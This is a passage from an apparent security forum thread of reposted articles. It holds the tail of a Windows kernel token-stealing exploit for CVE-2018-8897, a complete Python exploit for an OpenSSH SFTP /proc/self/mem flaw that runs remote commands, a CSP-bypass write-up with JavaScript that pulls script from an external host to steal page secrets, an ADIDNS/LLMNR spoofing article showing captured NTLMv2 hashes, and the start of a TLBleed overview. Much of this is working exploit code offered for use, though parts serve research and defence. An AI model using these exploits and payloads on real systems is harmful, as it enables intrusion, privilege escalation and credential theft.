CurrentProcess + i ); if ( ( Member & ~0xF ) == CurrentToken ) { *( uint64_t * ) ( CurrentProcess + i ) = SystemToken; break; } } k_PsDereferencePrimaryToken( CurrentToken ); k_PsDereferencePrimaryToken( SystemToken ); Sursa: https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/
  11. # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux # The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35 # # Adam Simuntis :: https://twitter.com/adamsimuntis # Mindaugas Slusnys :: https://twitter.com/mislusnys import paramiko import sys import time from pwn import * # parameters cmd = 'touch /tmp/pwn; touch /tmp/pwn2' host = '172.16.15.59' port = 22 username = 'secforce' password = 'secforce' # connection ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname = host, port = port, username = username, password = password) sftp = ssh.open_sftp() # parse /proc/self/maps to get addresses log.info("Analysing /proc/self/maps on remote system") sftp.get('/proc/self/maps','maps') with open("maps","r") as f: lines = f.readlines() for line in lines: words = line.split() addr = words[0] if ("libc" in line and "r-xp" in line): path = words[-1] addr = addr.split('-') BITS = 64 if len(addr[0]) > 8 else 32 print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path) libc_base = int(addr[0], 16) libc_path = path if ("[stack]" in line): addr = addr.split("-") saddr_start = int(addr[0], 16) saddr_end = int(addr[1], 16) print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1]) # download remote libc and extract information print "[+] Fetching libc from remote system..\n" sftp.get(str(libc_path), 'libc.so') e = ELF("libc.so") sys_addr = libc_base + e.symbols['system'] exit_addr = libc_base + e.symbols['exit'] # gadgets for the RET slide and system() if BITS == 64: pop_rdi_ret = libc_base + next(e.search('\x5f\xc3')) ret_addr = pop_rdi_ret + 1 else: ret_addr = libc_base + next(e.search('\xc3')) print "\n[+] system() @ {}".format(hex(sys_addr)) print "[+] 'ret' @ {}".format(hex(ret_addr)) if BITS == 64: print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret)) with sftp.open('/proc/self/mem','rw') as f: if f.writable(): print "[+] We have r/w permissions for /proc/self/mem! All Good." else: print "[-] Fatal error. No r/w permission for mem." sys.exit(0) log.info("Patching /proc/self/mem on the remote system") stack_size = saddr_end - saddr_start new_stack = "" print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start)) #sleep(20) if BITS == 32: new_stack += p32(ret_addr) * (stack_size/4) new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12] new_stack += p32(sys_addr) new_stack += p32(exit_addr) new_stack += p32(saddr_start) else: new_stack += p64(ret_addr) * (stack_size/8) new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32] new_stack += p64(pop_rdi_ret) new_stack += p64(saddr_start) new_stack += p64(sys_addr) new_stack += p64(exit_addr) # debug info with open("fake_stack","w") as lg: lg.write(new_stack) # write cmd to top off the stack f.seek(saddr_start) f.write(cmd + "\x00") # write the rest from bottom up, we're going to crash at some point for off in range(stack_size - 32000, 0, -32000): cur_addr = saddr_start + off try: f.seek(cur_addr) f.write(new_stack[off:off+32000]) except: print "Stack write failed - that's probably good!" print "Check if you command was executed..." sys.exit(0) sftp.close() ssh.close() Sursa: https://www.exploit-db.com/exploits/45001/?rss&amp;utm_source=dlvr.it&amp;utm_medium=twitter
  12. Neatly bypassing CSP How to trick CSP in letting you run whatever you want By bo0om, Wallarm research Content Security Policy or CSP is a built-in browser technology which helps protect from attacks such as cross-site scripting (XSS). It lists and describes paths and sources, from which the browser can safely load resources. The resources may include images, frames, javascripts and more. But what if we can give an example of successful XSS event when no unsafe resource origins are allowed? Read on to find out how. How CSP works when everything is well. A common usage scenario here is when CSP specifies that the images can only be loaded from the current domain, which means that all the tags with external domains will be ignored. CSP policy is commonly used to block untrusted JS and minimize the change of a successful XSS exploit. Here is an example of allowing resource from the local domain (self) to be loaded and executed in-line: Content-Security-Policy: default-src ‘self’ ‘unsafe-inline’; Since a security policy implies “prohibited unless explicitly allowed”, this configuration prohibits usage of any functions that execute code transmitted as a string. For example: eval, setTimeout, setInterval will all be blocked because of the setting unsafe-eval Any content from external sources is also blocked, including images, css, websockets, and, especially, JS To see for yourself how it works, check out this code where I deliberately put in a XSS exploit. Try to steal the secret this way without spooking the user, i.e. without a redirect. Tricking CSP Despite the limitations, we can still upload scenarios, create frames and put together images because self does not prevent working with the resources governed by Self Origin Policy (SOP). Since CSP also applies to frames, the same policy governs frames that may include data, blob or files formed with srcdoc as protocols. So, can we really execute an arbitrary javascript in a test file? The truth is out there. We are going to rely on a neat tick here. Most of the modern browser automatically convert files, such as text files or images, to an HTML page. The reason for this behavior is to correctly depict the content in the browser window; it needs to have the right background, be centered and so on. However, iframe is also a browser window!. Thus, opening any file that needs to shown in a browser in an iframe (i.e. favicon.ico or robots.txt) will immediately convert them into HTML without any data validation as long as the content-type is right. What happens if a frame opens a site page that doesn’t have a CSP header? You can guess the answer. Without CSP, an open frame will execute all the JS inside the page. If the page has an XSS exploit, we can write a js into the frame ourselves. To test this, let’s try a scenario which opens an iframe. Let’s use bootstrap.min.css, which we already mentioned earlier, as an example. frame=document.createElement(“iframe”); frame.src=”/css/bootstrap.min.css”; document.body.appendChild(frame); Let’s take a look at what’s in the frame. As expected, CSS got converted into HTML and we managed to overwrite the content of head (even though it was empty to begin with). Now, let’s see if we can get it to suck in an external JS file. script=document.createElement(‘script’); script.src=’//bo0om.ru/csp.js’; window.frames[0].document.head.appendChild(script); It worked! this is how we can execute an injecting through an iframe, create our own js scenario and query the parent window to steal its data. All you need for an XSS exploit is to open an iframe and pointed it at any path that doesn’t include a CSP header. It can be the standard favicon.ico, robots.txt, sitemap.xml, css/js, jpg or other files. PoC Slight of hand and no magic What if the site developer was careful and any expected site response (200-OK) includes X-Frame-Options: Deny? We can still try to get in. The second common error in using CSP is a lack of protective headers when returning web scanner errors. The simplest way to try this is to try to open a web page that doesn’t exist. I noticed that many resources only include X-Frame-Options on response with 200 code and not with 404 code. If that is also accounted for, we can try causing the site to return a standard web-server “invalid request” message. For example, force NGINX to return “400 bad request”, all you need to do is to query on level above it at /../ To prevent the browser from normalizing the request and replacing /../ with /, we will use unicode for the dots and the last slash. frame=document.createElement(“iframe”); frame.src=”/%2e%2e%2f”; document.body.appendChild(frame); Another possibility here is passing and incorrect unicode path, i.e. /% or /%%z However, the easiest way to get a web-server to return an error is to exceed the URL allowed length. Most modern browsers can concoct a url which is much much longer than a web-server can handle. A standard default url length handled by such web-servers and NGINX & Apache is set not to exceed 8kB. To try that, we can execute a similar scenario with a path length of 20000 byte: frame=document.createElement(“iframe”); frame.src=”/”+”A”.repeat(20000); document.body.appendChild(frame); Yet another way to fool the server into returning an error is to trigger a cookie length limit. Again, browsers support more and longer cookies than web-servers can handle. Following the same scenario: Create a humongous cookie for(var i=0;i<5;i++){document.cookie=i+”=”+”a”.repeat(4000)}; 2. Open an iframe using any address, which will cause the server to return an error (often without XFO or CSP) 3. Remove the humongous cookie: for(var i=0;i<5;i++){document.cookie=i+”=”} 4. Write your own js script into the frame that steals the parent’s secret Try it for yourself. Here are some hints for you if you need them: PoC There many other ways to cause the web-server to return an error, for example we can send a POST request which is too long or cause the web-server 500 error somehow. Why is CSP so gullible and what to do about it? The simple underlying reason is that the policy controlling the resource is embedded within the resource itself. To avoid the bad situations, my recommendations are: CSP headers should be present on all the pages, event on the error pages returned by the web-server. CSP options should be configured to restrict the rights to just those necessary to work with the specific resource. Try setting Content-Security-Policy-Report-Only: default-src ‘none’ and gradually adding permission rules for specific use cases. If you have to use unsafe-inline for correctly loading and processing the resources, your only protection is to use nonce or hash-source. Otherwise, you are exposed to XSS exploits and if CSP doesn’t protect, why do you need it in the first place ?! Additionally, as shared by @majorisc, another trick for stealing the data from a page is to use RTCPeerConnection and to pass the secret via DNS requests. default-src ‘self’ doesn’t protect from it, unfortunately. Keep reading our blog for more tricks from our magic bag. Sursa: https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa
  13. Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS Kevin Robertson July 10th, 2018 Exploiting weaknesses in name resolution protocols is a common technique for performing man-in-the-middle (MITM) attacks. Two particularly vulnerable name resolution protocols are Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBNS). Attackers leverage both of these protocols to respond to requests that fail to be answered through higher priority resolution methods, such as DNS. The default enabled status of LLMNR and NBNS within Active Directory (AD) environments allows this type of spoofing to be an extremely effective way to both gain initial access to a domain, and also elevate domain privilege during post exploitation efforts. The latter use case lead to me developing Inveigh, a PowerShell based LLMNR/NBNS spoofing tool designed to run on a compromised AD host. PS C:\users\kevin\Desktop\Inveigh> Invoke-Inveigh -ConsoleOutput Y [*] Inveigh 1.4 Dev started at 2018-07-05T22:29:35 [+] Elevated Privilege Mode = Enabled [+] Primary IP Address = 192.168.125.100 [+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = 192.168.125.100 [+] LLMNR Spoofer = Enabled [+] NBNS Spoofer = Enabled [+] SMB Capture = Enabled [+] HTTP Capture = Enabled [+] HTTPS Capture = Disabled [+] HTTP/HTTPS Authentication = NTLM [+] WPAD Authentication = NTLM [+] WPAD Default Response = Enabled [+] Real Time Console Output = Enabled WARNING: [!] Run Stop-Inveigh to stop manually [*] Press any key to stop real time console output [+] [2018-07-05T22:29:53] LLMNR request for badrequest received from 192.168.125.102 [Response Sent] [+] [2018-07-05T22:29:53] SMB NTLMv2 challenge/response captured from 192.168.125.102(INVEIGH-WKS2): testuser1::INVEIGH:3E834C6F9FC3CA5B:CBD38F1537AAD7D39CE6A5BC5687373A:010100000000000071ADB439D114D401D5B48AB8C3EC8E010000000002000E0049004E00560045004900470048000100180049004E00560045004900470048002D0057004B00530031000400160069006E00760065006900670068002E006E00650074000300300049006E00760065006900670068002D0057004B00530031002E0069006E00760065006900670068002E006E00650074000500160069006E00760065006900670068002E006E00650074000700080071ADB438D114D401060004000200000008003000300000000000000000000000002000004FC481EC79C5F6BB2B29A2C828A02EC028C9FF563BE5D9597D51FD6DF29DC8BD0A0010000000000000000000000000000000000009001E0063006900660073002F006200610064007200650071007500650073007400000000000000000000000000 Throughout my time working on Inveigh, I’ve explored LLMNR/NBNS spoofing from the perspective of different levels of privilege within AD environments. Many of the updates to Inveigh along the way have actually attempted to cover additional privilege based use cases. Recently though, some research outside of Inveigh has placed a nagging question in my head. Is LLMNR/NBNS spoofing even the best way to perform name resolution based MITM attacks if you already have unprivileged access to a domain? In an effort to obtain an answer, I kept returning to the suspiciously configured AD role which inspired the question to begin with, Active Directory-Integrated DNS (ADIDNS). Take it from the Top For the purpose of this write-up, I’ll just recap two key areas of of LLMNR/NBNS spoofing. First, without implementing some router based wizardry, LLMNR and NBNS requests are contained within a single multicast or broadcast domain respectively. This can greatly limit the scope of a spoofing attack with regards to both the affected systems and potential privilege of the impacted sessions. Second, by default, Windows systems use the following priority list while attempting to resolve name resolution requests through network based protocols: DNS LLMNR NBNS Although not exploited directly as part of the attacks, DNS has a large impact on the effectiveness of LLMNR/NBNS spoofing due to controlling which requests fall down to LLMNR and NBNS. Basically, if a name request matches a record listed in DNS, a client won’t usually attempt to resolve the request through LLMNR and NBNS. Do we really need to settle for anything less than the top spot in the network based name resolution protocol hierarchy when performing our attacks? Is there a simple way to leverage DNS directly? Keeping within our imposed limitation of having only unprivileged access to a domain, let’s see what we have to work with. Active Directory-Integrated DNS Zones Modifying ADIDNS Zones Dynamic Updates Supplementing LLMNR/NBNS Spoofing with Dynamic Updates Remembering the Way Wildcard Records What’s in a Name? ADIDNS Syncing and Replication SOA Serial Number Maintaining Control of Nodes Node Tombstoning Node Deletion Defending Against ADIDNS Attacks And the Winner Is? Tools! Active Directory-Integrated DNS Zones Domain controllers and ADIDNS zones go hand in hand. Each domain controller will usually have an accessible DNS server hosting at least the default ADIDNS zones. The first default setting I’d like to highlight is the ADIDNS zone discretionary access control list (DACL). As you can see, the zone has ‘Authenticated Users’ with ‘Create all child objects’ listed by default. An authenticated user is a pretty low barrier of entry for a domain and certainly covers our unprivileged access goal. But how do we put ourselves into a position to leverage this permission and what can we do with it? Modifying ADIDNS Zones There are two primary methods of remotely modifying an ADIDNS zone. The first involves using the RPC based management tools. These tools generally require a DNS administrator or above so I won’t bother describing their capabilities. The second method is DNS dynamic updates. Dynamic updates is a DNS specific protocol designed for modifying DNS zones. Within the AD world, dynamic updates is primarily leveraged by machine accounts to add and update their own DNS records. This brings us to another default ADIDNS zone setting of interest, the enabled status of secure dynamic updates. Dynamic Updates Last year, in order to leverage this default setting more easily during post exploitation, I developed a PowerShell DNS dynamic updates tool called Invoke-DNSUpdate. PS C:\Users\kevin\Desktop\Powermad> Invoke-DNSupdate -DNSType A -DNSName test -DNSData 192.168.125.100 -Verbose VERBOSE: [+] TKEY name 648-ms-7.1-4675.57409638-8579-11e7-5813-000c296694e0 VERBOSE: [+] Kerberos preauthentication successful VERBOSE: [+] Kerberos TKEY query successful [+] DNS update successful The rules for using secure dynamic updates are pretty straightforward once you understand how permissions are applied to the records. If a matching DNS record name does not already exist in a zone, an authenticated user can create the record. The creator account will receive ownership/full control of the record. If a matching record name already exists in the zone, the authenticated user will be prevented from modifying or removing the record unless the user has the required permission, such as the case where a user is an administrator. Notice that I’m using record name instead of just record. The standard DNS view can be confusing in this regard. Permissions are actually applied based on the record name rather than individual records as viewed in the DNS console. For example, if a record named ‘test’ is created by an administrator, an unprivileged account cannot create a second record named ‘test’ as part of a DNS round robin setup. This also applies across multiple record types. If a default A record exists for the root of the zone, an unprivileged account cannot create a root MX record for the zone since both records are internally named ‘@’. Further along in this post, we will take a look at DNS records from another perspective which will offer a better view of ADIDNS records grouped by name. Below are default records that will prevent an unprivileged account from impacting AD services such as Kerberos and LDAP. There are few limitations for record types that can be created through dynamic updates with an unprivileged user. The permitted types are only restricted to those that are supported by the Windows server dynamic updates implementation. Most common record types are supported. Invoke-DNSUpdate itself currently supports A, AAAA, CNAME, MX, PTR, SRV, and TXT records. Overall, secure dynamic updates alone is certainly exploitable if non-existing DNS records worth adding can be identified. Supplementing LLMNR/NBNS Spoofing with Dynamic Updates In a quest to weaponize secure dynamic updates to function in a similar fashion to LLMNR/NBNS spoofing, I looked at injecting records into ADIDNS that matched received LLMNR/NBNS requests. In theory, a record that falls down to LLMNR/NBNS shouldn’t exist in DNS. Therefore, these records are eligible to be created by an authenticated user. This method is not practical for rare or one time only name requests. However, if you keep seeing the same requests through LLMNR/NBNS, it may be beneficial to add the record to DNS. The upcoming version of Inveigh contains a variation of this technique. If Inveigh detects the same LLMNR/NBNS request from multiple systems, a matching record can be added to ADIDNS. This can be effective when systems are sending out LLMNR/NBNS requests for old hosts that are no longer in DNS. If multiple systems within a subnet are trying to resolve specific names, outside systems may also be trying. In that scenario, injecting into ADIDNS will help extend the attack past the subnet boundary. PS C:\users\kevin\Desktop\Inveigh> Invoke-Inveigh -ConsoleOutput Y -DNS Y -DNSThreshold 4 [*] Inveigh 1.4 Dev started at 2018-07-05T22:32:37 [+] Elevated Privilege Mode = Enabled [+] Primary IP Address = 192.168.125.100 [+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = 192.168.125.100 [+] LLMNR Spoofer = Enabled [+] DNS Injection = Enabled [+] SMB Capture = Enabled [+] HTTP Capture = Enabled [+] HTTPS Capture = Disabled [+] HTTP/HTTPS Authentication = NTLM [+] WPAD Authentication = NTLM [+] WPAD Default Response = Enabled [+] Real Time Console Output = Enabled WARNING: [!] Run Stop-Inveigh to stop manually [*] Press any key to stop real time console output [+] [2018-07-05T22:32:52] LLMNR request for dnsinject received from 192.168.125.102 [Response Sent] [+] [2018-07-05T22:33:00] LLMNR request for dnsinject received from 192.168.125.100 [Response Sent] [+] [2018-07-05T22:35:00] LLMNR request for dnsinject received from 192.168.125.104 [Response Sent] [+] [2018-07-05T22:41:00] LLMNR request for dnsinject received from 192.168.125.105 [Response Sent] [+] [2018-07-05T22:50:00] LLMNR request for dnsinject received from 192.168.125.106 [Response Sent] WARNING: [!] [2018-07-05T22:33:01] DNS (A) record for dnsinject added Remembering the Way While trying to find an ideal secure dynamic updates attack, I kept hitting roadblocks with either the protocol itself or the existence of default DNS records. Since, as mentioned, I had planned on rolling a dynamic updates attack into Inveigh, I started thinking more about how the technique would be employed during penetration tests. To help testers confirm that the attack would even work, I realized that it would be helpful to create a PowerShell function that could view ADIDNS zone permissions through the context of an unprivileged account. But how would I even remotely enumerate the DACL without access to the administrator only tools? Some part of my brain that obliviously hadn’t been taking part in this ADIDNS research immediately responded with, “the zones are stored in AD, just view the DACL through LDAP.” LDAP… …there’s another way into the zones that I haven’t checked. Reviewing the topic that I likely ran into during my days as a network administrator, I found that the ADIDNS zones are currently stored in either the DomainDNSZones or ForestDNSZones partitions. LDAP provides a method for ‘Authenticated Users’ to modify an ADIDNS zone without relying on dynamic updates. DNS records can be added to an ADIDNS zone directly through LDAP by creating an AD object of class dnsNode. With this simple understanding, I now had a method of executing the DNS attack I had been chasing the whole time. Wildcard Records Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. PS C:\Users\kevin\Desktop\Powermad> Resolve-DNSName NoDNSRecord Name Type TTL Section IPAddress ---- ---- --- ------- --------- NoDNSRecord.inveigh.net A 600 Answer 192.168.125.100 Unlike LLMNR/NBNS, requests for fully qualified names matching a zone are also resolved. PS C:\Users\kevin\Desktop\Powermad> Resolve-DNSName NoDNSRecord2.inveigh.net Name Type TTL Section IPAddress ---- ---- --- ------- --------- NoDNSRecord2.inveigh.net A 600 Answer 192.168.125.100 With dynamic updates, my wildcard record injection efforts were prevented by limitations within dynamic updates itself. Dynamic updates, at least the Windows implementation, just doesn’t seem to process the ‘*’ character correctly. LDAP however, does not have the same problem. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BA-00-00-00-00-00-02-58-00-00-00-00-22-D8-37-00-C0-A8-7D-64 [+] ADIDNS node * added What’s in a Name? Taking a step back, let’s look at how DNS nodes are used to form an ADIDNS record. The main structure of the record is stored in the dnsRecord attribute. This attribute defines elements such as the record type, target IP address or hostname, and static vs. dynamic classification. All of the key record details outside of the name are stored in dnsRecord. If you are interested, more information for the attribute’s structure can be found in MS-DNSP. I created a PowerShell function called New-DNSRecordArray which can create a dnsRecord array for A, AAAA, CNAME, DNAME, MX, NS, PTR, SRV, and TXT record types. PS C:\Users\kevin\Desktop\Powermad> $dnsRecord = New-DNSRecordArray -Type A -Data 192.168.125.100 PS C:\Users\kevin\Desktop\Powermad> [System.Bitconverter]::ToString($dnsrecord) 04-00-01-00-05-F0-00-00-BA-00-00-00-00-00-02-58-00-00-00-00-79-D8-37-00-C0-A8-7D-64 As I previously mentioned, LDAP offers a better view of how DNS records with a matching name are grouped together. A single DNS node can have multiple lines within the dnsRecord attribute. Each line represents a separate DNS record of the same name. Below is an example of the multiple records all contained within the dnsRecord attribute of a node named ‘@’. Lines can be added to a node’s dnsRecord attribute by appending rather than overwriting the existing attribute value. The PowerShell function I created to perform attribute edits, Set-ADIDNSNodeAttribute, has an ‘Append’ switch to perform this task. ADIDNS Syncing and Replication When modifying an ADIDNS zone through LDAP, you may observe a delay between when the node is added to LDAP and when the record appears in DNS. This is due to the fact that the DNS server service is using its own in-memory copy of the ADIDNS zone. By default, the DNS server will sync the in-memory copy with AD every 180 seconds. In large, multi-site AD infrastructures, domain controller replication time may be a factor in ADIDNS spoofing. To fully leverage the reach of added records within an enterprise, the attack time will need to extend past replication delays. By default, replication between sites can take up to three hours. To cut down on delays, start the attack by targeting the DNS server which will have the biggest impact. Although adding records to each DNS server in an environment in order to jump ahead of replication will work, keep in mind that AD will need to sort out the duplicate objects once replication does take place. SOA Serial Number Another consideration when working with ADIDNS zones is the potential presence integrated DNS servers on the network. If a server is hosting a secondary zone, the serial number is used to determine if a change has occurred. Luckily, this number can be incremented when adding a DNS node through LDAP. The incremented serial number needs to be included in the node’s dnsRecord array to ensure that the record is copied to the server hosting the secondary zone. The zone’s SOA serial number will be the highest serial number listed in any node’s dnsRecord attribute. Care should be taken to only increment the SOA serial number by one so that a zone’s serial number isn’t unnecessarily increased by a large amount. I have created a PowerShell function called New-SOASerialNumberArray that simplifies the process. PS C:\Users\kevin\Desktop\Powermad> New-SOASerialNumberArray 62 0 0 0 The SOA serial number can also be obtained through nslookup. PS C:\Users\kevin\Desktop\Powermad> nslookup Default Server: UnKnown Address: 192.168.125.10 > set type=soa > inveigh.net Server: UnKnown Address: 192.168.125.10 inveigh.net primary name server = inveigh-dc1.inveigh.net responsible mail addr = hostmaster.inveigh.net serial = 255 refresh = 900 (15 mins) retry = 600 (10 mins) expire = 86400 (1 day) default TTL = 3600 (1 hour) inveigh-dc1.inveigh.net internet address = 192.168.125.10 The gathered serial number can be fed directly to New-SOASerialNumberArray. In this scenario, New-SOASerialNumberArray will skip connecting to a DNS server and instead it will use the specified serial number. Maintaining Control of Nodes To review, once a node is created with an authenticated user, the creator account will have ownership/full control of the node. The ‘Authenticated Users’ principal itself will not be listed at all within the node’s DACL. Therefore, losing access to the creator account can create a scenario where you will not be able to remove an added record. To avoid this, the dNSTombstoned attribute can be set to ‘True’ upon node creation. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Tombstone -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BC-00-00-00-00-00-02-58-00-00-00-00-22-D8-37-00-C0-A8-7D-64 [+] ADIDNS node * added This puts a node in a state where any authenticated user can perform node modifications. Alternatively, the node’s DACL can be modified to grant access to additional users or groups. PS C:\Users\kevin\Desktop\Powermad> Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net [+] ACE added for Authenticated Users to * DACL Having the creator account’s ownership and full control permission listed on a node can make things really easy on the blue team in the event they discover your record. Although changing node ownership is possible, a token with the SeRestorePrivilege is required. Node Tombstoning Record cleanup isn’t as simple as just removing the node from LDAP. If you do, the record will hang around within the DNS server’s in-memory zone copy until the service is restarted or the ADIDNS zone is manually reloaded. The 180 second AD sync will not remove the record from DNS. When a record is normally deleted in an ADIDNS zone, the record is removed from the in-memory DNS zone copy and the node object remains in AD. To accomplish this, the node’s dNSTombstoned attribute is set to ‘True’ and the dnsRecord attribute is updated with a zero type entry containing the tombstone timestamp. Generating you own valid zero type array isn’t necessarily required to remove a record. If the dnsRecord attribute is populated with an invalid value, such as just 0x00, the value will be switched to a zero type array during the next AD/DNS sync. For cleanup, I’ve created a PowerShell function called Disable-ADIDNSNode which will update the dNSTombstoned and dnsRecord attributes. PS C:\Users\kevin\Desktop\Powermad> Disable-ADIDNSNode -Node * -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net [+] ADIDNS node * tombstoned The cleanup process is a little different for records that exist as a single dnsRecord attribute line within a multi-record DNS node. Simply remove the relevant dnsRecord line and wait for sync/replication. Set-DNSNodeAttribute can be used for this task. One note regarding tombstoned nodes in case you decide to work with existing records through either LDAP or dynamic updates. The normal record aging process will also set the dNSTombstoned attribute to ‘True’. Records in this state are considered stale, and if enabled, ready for scavenging. If scavenging is not enabled, these records can hang around in DNS for a while. In my test labs without enabled scavenging, I often find stale records that were originally registered by machine accounts. Caution should be taken when working with stale records. Although they are certainly potential targets for attack, they can also be overwritten or deleted by mistake. Node Deletion Fully removing the DNS records from both DNS and AD to better cover your tracks is possible. The record needs to first be tombstoned. Once the AD/DNS sync has occurred to remove the in-memory record, the node can be deleted through LDAP. Replication however makes this tricky. Simply performing these two steps quickly on a single domain controller will result in only the node deletion being replicated to other domain controllers. In this scenario, the records will remain within the in-memory zone copies on all but one domain controller. During penetration tests, tombstoning is probably sufficient for cleanup and matches how a record would normally be deleted from ADIDNS. Defending Against ADIDNS Attacks Unfortunately, there are no known defenses against ADIDNS attacks. Oh alright, there are easily deployed defenses and one of them actually involves using a wildcard record to your advantage. The simplest way to disrupt potential ADIDNS spoofing is to maintain control of critical records. For example, creating a static wildcard record as an administrator will prevent unprivileged accounts from creating their own wildcard record. PS C:\Users\kevin\Desktop\Powermad> New-ADIDNSNode -Node * -Tombstone -Verbose VERBOSE: [+] Domain Controller = Inveigh-DC1.inveigh.net VERBOSE: [+] Domain = inveigh.net VERBOSE: [+] ADIDNS Zone = inveigh.net VERBOSE: [+] Distinguished Name = DC=*,DC=inveigh.net,CN=MicrosoftDNS,DC=DomainDNSZones,DC=inveigh,DC=net VERBOSE: [+] Data = 192.168.125.100 VERBOSE: [+] DNSRecord Array = 04-00-01-00-05-F0-00-00-BD-00-00-00-00-00-02-58-00-00-00-00-20-D8-37-00-C0-A8-7D-64 [-] Exception calling "SendRequest" with "1" argument(s): "The object exists." The records can be pointed at your black-hole method of choice, such as 0.0.0.0. An added bonus of an administrator controlled wildcard record is that the record will also disrupt LLMNR/NBNS spoofing. The wildcard will satisfy all name requests for a zone through DNS and prevent requests from falling down to LLMNR/NBNS. I would go so far as to recommend administrator controlled wildcard records as a general defense for LLMNR/NBNS spoofing. You can also modify an ADIDNS zone’s DACL to be more restrictive. The appropriate settings are environment specific. Fortunately, the likelihood of having an actual requirement for allowing ‘Authenticated Users’ to create records is probably pretty low. So, there certainly may be room for DACL hardening. Just keep in mind that limiting record creation to only administrators and machine accounts may still leave a lot of opportunities for attack without also maintaining control of critical records. And the Winner Is? The major advantage of ADIDNS spoofing over LLMNR/NBNS spoofing is the extended reach and the major disadvantage is the required AD access. Let’s face it though, we don’t necessarily need a better LLMNR/NBNS spoofer. Looking back, NBNS spoofing was a security problem long before LLMNR joined the game. LLMNR and NBNS spoofing both continue to be effective year after year. My general recommendation, having worked with ADIDNS spoofing for a little while now, would be to start with LLMNR/NBNS spoofing and add in ADIDNS spoofing as needed. The LLMNR/NBNS and ADIDNS techniques actually complement each other pretty well. To help you make your own decision, the following table contains some general traits of ADIDNS, LLMNR, and NBNS spoofing: Trait ADIDNS LLMNR NBNS Can require waiting for replication/syncing x Easy to start and stop attacks x x Exploitable when default settings are present x x x Impacts fully qualified name requests x Requires constant network traffic for spoofing x x Requires domain credentials x Requires editing AD x Requires privileged access to launch attack from a compromised system x Targets limited to the same broadcast/multicast domains as the spoofer x x Disclaimer: There are still lots of areas to explore with ADIDNS zones beyond just replicating standard LLMNR/NBNS spoofing attacks. Tools! I’ve released an updated version of Powermad which contains several functions for working with ADIDNS, including the functions shown in the post: https://github.com/Kevin-Robertson/Powermad I will be populating the Powermad wiki with step by step instructions: https://github.com/Kevin-Robertson/Powermad/wiki Also, if you are feeling brave, an ADIDNS spoofing capable version of Inveigh 1.4 can be found in the dev branch: https://github.com/Kevin-Robertson/Inveigh/tree/dev Sursa: https://blog.netspi.com/exploiting-adidns/
  14. TLBleed Overview TLBleed is a new side channel attack that has been proven to work on Intel CPU’s with Hyperthreading (generally Simultaneous Multi-threading, or SMT, or HT on Intel) enabled. It relies on concurrent access to the TLB, and it being shared between threads. We find that the L1dtlb and the STLB (L2 TLB) is shared between threads on Intel CPU cores. Result This means that co-resident hyperthreads can get a certain amount of information on the data memory accesses of the other HT, without needing any shared cache. Whereas the cache can be partitioned to protect against cache attacks (such as in Cloak using TSX, or using CAT, or using page coloring), this is practically impossible for the TLB, and no such systems have been proposed. Thus in the presence of cache defenses, TLBleed remains a risk in this threat model. Requirements (a.k.a. threat model) The threat model is identical to Colin Pervical’s seminal 2005 work, Cache Missing for Fun and Profit, which arguably introduced practical cache side channels. Different from TLBleed, it requires concurrent access to the cache shared between Hyperthreads. TLBleed gets all information through the shared TLB, which can’t be partitioned between processes in software (either application or OS). Impact & Coverage As a result of seeing this work, OpenBSD decided to disable Hyperthreading by default. This has prompted some speculation that TLBleed is a spectre-like attack, but that is not the case. OpenBSD also realizes the exact impact of TLBleed. Red Hat has a very thoughtful piece here. There has been significant news coverage: TheRegister (and this one), ArsTechnica, ZDnet, Techrepublic, TechTarget, ITwire, tweakers, and a personal favorite, the SecurityNow Podcast episode 669 (mp3, show notes, youtube). Overview of results We briefly tour the results of our paper with some technical details that a technical audience might be interested in. Full technical details can be found in the paper, linked below. libgcrypt ECC point multiplication To demonstrate the effectiveness of TLBleed, we side-channel the non-side-channel resistant version of the libgcrypt EdDSA ECC scalar-point multiplication function. In later 